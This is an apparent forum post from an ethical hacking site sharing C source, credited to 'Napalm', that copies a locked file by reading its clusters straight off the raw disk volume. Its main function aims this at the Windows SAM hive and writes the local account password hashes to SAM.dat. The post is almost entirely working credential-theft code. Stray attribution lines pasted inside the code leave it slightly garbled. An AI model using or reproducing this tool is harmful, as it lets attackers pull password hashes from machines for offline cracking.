EH-Net

/*
Please try and read and understand this source code. You will learn somthing.

Sector  = 512 Bytes of disk space
Cluster = A Group of Sectors. This is different depending on your file
      system. But normally its 4Kb so thats 8 sectors.
VCN    = Virtual Cluster Number. Simply the index of the cluster within its context.
LCN    = Logical Cluster Number. The physical cluster index on containing media.
Extent    = The extent of a Cluster index.

The DirectCopy function invokes a Device Control Code to get the cluster information about a file.
We then loop though each resulting extent and copy each cluster to a new file.
*/

#define _WIN32_WINNT 0x0500
Not written by me, its by Napalm
#include <winioctl.h>

BOOL DirectCopy(LPSTR lpszSrc, LPSTR lpszDest)
{
    BOOL bResult = FALSE;
    HANDLE hSrc = CreateFile(lpszSrc, FILE_READ_ATTRIBUTES, (FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE), NULL, OPEN_EXISTING, 0, 0);
    if(hSrc != INVALID_HANDLE_VALUE){
        CHAR szDrive[7]; wsprintf(szDrive, "%c:", *lpszSrc);
        DWORD dwSectorPerCluster, dwBytesPerSector;
        GetDiskFreeSpace(szDrive, &dwSectorPerCluster, &dwBytesPerSector, NULL, NULL);
        DWORD dwClusterSize = (dwBytesPerSector * dwSectorPerCluster);
        LARGE_INTEGER liFileSize; liFileSize.LowPart = GetFileSize(hSrc, (LPDWORD)&liFileSize.HighPart);
        DWORD dwClusters = (liFileSize.QuadPart / dwClusterSize);
        DWORD dwRead, dwWritten, dwPointsSize = sizeof(RETRIEVAL_POINTERS_BUFFER) + (dwClusters * (sizeof(LARGE_INTEGER) * 2));
        PRETRIEVAL_POINTERS_BUFFER pPoints = (PRETRIEVAL_POINTERS_BUFFER) new BYTE[dwPointsSize];
        STARTING_VCN_INPUT_BUFFER vcnStart = { 0 };
        if(DeviceIoControl(hSrc, FSCTL_GET_RETRIEVAL_POINTERS, &vcnStart, sizeof(vcnStart), pPoints, dwPointsSize, &dwWritten, NULL)){
            wsprintf(szDrive, "\\\\.\\%c:", *lpszSrc);
            HANDLE hDrive = CreateFile(szDrive, GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, 0);
            if(hDrive != INVALID_HANDLE_VALUE){
                HANDLE hDest = CreateFile(lpszDest, GENERIC_WRITE, 0, NULL, CREATE_NEW, 0, 0);
                if(hDest != INVALID_HANDLE_VALUE){
                    SetFilePointer(hDest, liFileSize.LowPart, &liFileSize.HighPart, FILE_BEGIN);
                    SetEndOfFile(hDest);
                    LPBYTE lpCluster = new BYTE[dwClusterSize];
                    LARGE_INTEGER vcnPrev = pPoints->StartingVcn;
                    for(DWORD dwExtent = 0; dwExtent < pPoints->ExtentCount; dwExtent++){
                        DWORD dwLength = (DWORD)(pPoints->Extents[dwExtent].NextVcn.QuadPart - vcnPrev.QuadPart);
                        LARGE_INTEGER liSrcPos = { (pPoints->Extents[dwExtent].Lcn.QuadPart * dwClusterSize) };
                        LARGE_INTEGER liDstPos = { (vcnPrev.QuadPart * dwClusterSize) };
                        for(DWORD dwCluster = 0; dwCluster < dwLength; dwCluster++){
                            SetFilePointer(hDrive, liSrcPos.LowPart, &liSrcPos.HighPart, FILE_BEGIN);
                            ReadFile(hDrive, lpCluster, dwClusterSize, &dwRead, NULL);
                            SetFilePointer(hDest, liDstPos.LowPart, &liDstPos.HighPart, FILE_BEGIN);
                            WriteFile(hDest, lpCluster, dwRead, &dwWritten, NULL);
                            liSrcPos.QuadPart += dwClusterSize; liDstPos.QuadPart += dwClusterSize;
                        }
                        vcnPrev = pPoints->Extents[dwExtent].NextVcn;
                    }
                    delete lpCluster;
                    CloseHandle(hDest);
                    bResult = TRUE;
                }
                CloseHandle(hDrive);
            }
        }
        delete pPoints;
        CloseHandle(hSrc);
    }
    return bResult;
}

int main(int argc, char *argv[])
{
    CHAR szSAMFile[MAX_PATH + 12];
    GetSystemDirectory(szSAMFile, MAX_PATH);
    lstrcat(szSAMFile, "\\config\\SAM");
    return DirectCopy(szSAMFile, ".\\SAM.dat");

Not written by me, its by Napalm.
}